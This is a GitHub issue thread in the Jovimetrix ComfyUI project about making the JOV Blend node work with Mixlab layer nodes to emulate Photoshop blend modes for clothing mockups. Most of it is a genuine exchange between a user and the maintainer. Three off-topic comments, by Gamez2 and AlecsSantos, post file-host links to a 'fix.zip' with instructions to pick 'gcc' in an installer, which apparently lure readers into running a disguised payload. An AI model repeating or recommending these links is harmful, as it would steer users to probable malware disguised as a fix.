### ISSUE TITLE
JOV Blend compability with Mixlab

### ISSUE THREAD

**Issue by kakachiex2** [Amorano/Jovimetrix#49]
Hi Amorano, I'm building a workflow to emulate photoshop blend mode effects with layer and I'm using your JOV Blend node with Mixlab layer node but I'm getting empty result can you make your node compatible with mixlab layers node it will be helpful and useful.
![workflow (1)](https://github.com/user-attachments/assets/b0ef7af5-08da-44d1-b97d-fe22355df7e2)

**Comment by Amorano** [comment]
I will check it out! If the layers are images, then it should work same as if you plug in any image. If the layers some special type I will need to make a conversion node or perhaps add a new output just for that type =D

Cheers for the idea!

**Comment by kakachiex2** [comment]
Thanks Amorano, I will keep an eye on this I want to create a production mockup logo placement similar to photoshop with shadow layer and lighting layers I think it can be done with those node.

**Comment by kakachiex2** [comment]
Here is the full workflow if you want to give it a check.
![Logo Placement Mockup experiment](https://github.com/user-attachments/assets/08a95610-d418-40ec-8523-03caa1bd37d7)

**Comment by kakachiex2** [comment]
Need a lot of work to be production ready

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Amorano** [comment]
> Need a lot of work to be production ready, if you can give me some feedback would be nice and thanks for your excellent tools

Just so I understand the workflow(s)... You are looking to do normal alpha blend compositing?

![image](https://github.com/user-attachments/assets/4977ceee-620a-4cc3-9c73-95346953ab3c)

like in the image?  I am looking at the mixlab stuff now, but it seems you may not need a lot of the layering if you just slap composite as you go i.e. 2 layers in, one layer out into 2 layers in, etc...

**Comment by kakachiex2** [comment]
In photoshop to achieve the shadowing and lighting effects over flat color and logos or design you need:
- one layer with the shadow in linear burn blende mode
- another one on top the shadow layer in screen blend mode
I give thos layer a z-index of 1 for the shadow layer and 2 for the lightning layer it supposed to work but I'm using two separate blend JOV node to achieve this is not possible in one node only if the node has two blend mode for the image { A } and one for the image { B }.
Here is a clean and simple workflow to illustrate the concept:
![Emulate PS-BlendMode_ShadowLight](https://github.com/user-attachments/assets/fc9f8daf-b65b-4b4c-b959-9970a3abf013)

**Comment by kakachiex2** [comment]
Here is the image if you need testing:
![Hoodie_Lighting](https://github.com/user-attachments/assets/323d3a52-b07c-45a9-ad62-19ddef7eec99)
![Hoodie_Shadow](https://github.com/user-attachments/assets/c36c921d-839e-4a25-98a2-6ab555e5d920)

**Comment by kakachiex2** [comment]
The dark Hoodie is the lighting layer, and the white Hoodie is the shadow layer.

**Comment by kakachiex2** [comment]
Everything : Flat color mask to color the hoodie | Logos placement, design goes under those two layer to achieve the volumetric shadow and light effects.

**Comment by kakachiex2** [comment]
This is the final Workflow module for this part of the completed W
![Hoodie_FullMask](https://github.com/user-attachments/assets/8cfb6d47-a841-463d-9884-81b983be8951)
orkflow looks like the blend mode is not parsing throw the layers because is supposed to get the solid color mask layer.
I upload the mask layer if you need it.

![Emulate PS-BlendMode_ShadowLight](https://github.com/user-attachments/assets/ebed20c1-1d9e-43ef-9680-d24efff09867)

**Comment by Amorano** [comment]
> In photoshop to achieve the shadowing and lighting effects over flat color and logos or design you need:
> 
>     * one layer with the shadow in linear burn blend mode
>     * another one on top the shadow layer in screen blend mode
>       

![image](https://github.com/user-attachments/assets/38022ef3-0b44-4bc6-8751-11fb90af8de0)

![image](https://github.com/user-attachments/assets/3381b468-bfa0-4a52-a67b-716270e10c8e)

![image](https://github.com/user-attachments/assets/2d59b719-2ea7-49c5-983f-46fb134892b4)

[Latest push has the changes!](https://github.com/Amorano/Jovimetrix?tab=readme-ov-file#updates)

I have added support to pass through layers as "images". 

You can see in image 2 and 3 that mixlab is performing some type of blend/anti-aliasing. Just keep that in mind, as I also see a color shift in the mixlab nodes.

Let me know if that resolves this request!

cheers!

**Comment by kakachiex2** [comment]
Thanks, Amorano, let me test it.
But keep in mind the only way to know if it working is using the shadow and light layer flat color are not good for this testing.

**Comment by kakachiex2** [comment]
Looks like the blend mode is working but not properly, the flat color mask under the shadow and light layer looks dull it supposed to looks like this image.
Here is an example comfyui and PS maybe a problem with Mixlab layer don't pass blend mode correctly.
![BlendMode-01](https://github.com/user-attachments/assets/4eb72851-8b30-4e2b-ab8d-1f0837ca09ec)
![BlendMode](https://github.com/user-attachments/assets/0ea4e002-4262-4b27-8f9a-09c00896a689)

**Comment by kakachiex2** [comment]
This could be a great layer system for ComfyUI more efficient than the others implementation, but this is only a mockup idea.
![ComfyUI Layer Stack node-01](https://github.com/user-attachments/assets/31ad014f-7bf3-48c2-bda7-4f29684669b2)

**Comment by Amorano** [comment]
Unfortunately, making an entire layer compositing system like that requires time and I sadly do not have a job, so, that is a pipe dream idea for me. I will say, if I ever get sponsors, or a studio job (ever again) I will 100% invest into the idea you have above.

That said, I feel you are over-complicating your setup.

![image](https://github.com/user-attachments/assets/46d55b35-a0cb-467b-846f-83f24d6de645)

feels like it does the same thing you want, with no mussing in wacky layer stacks.

As for the blend node not working "properly" it is 100% working properly =D

The blend node is using the blendnodes library to do the actual blends, all being done in sRGB space.

[AS I MENTIONED THE OTHER DAY](https://github.com/Amorano/Jovimetrix/issues/49#issuecomment-2309034989) there is something in Mixlab that is anti-aliasing and changing the color space on the images. You can see that yourself plugging in a single image to a layer and rendering the layer with no changes back to an image.

**Comment by kakachiex2** [comment]
This setup work excellent if only for coloring the cloth but how do I add the lighting effects, The setup I post work excellent the only problem is dull appearance, another think is this is only a small part of the whole workflow is really big and more complicate.
Thanks for your help I will continue testing and experiment to see how to solve this problem, your node work excellent I test it combined with others node.

**Comment by Amorano** [comment]
> Looks like the blend mode is working but not properly, the flat color mask under the shadow and light layer looks dull it supposed to looks like this image. Here is an example comfyui and PS maybe a problem with Mixlab layer don't pass blend mode correctly.

![image](https://github.com/user-attachments/assets/794baf4c-2471-494e-a86d-152818389508)

just for completeness. I posted (similar) in the discord as well.

I hope that helps a bit in either case!

Cheers

**Comment by kakachiex2** [comment]
This last setup looks interesting I will check wen I have time
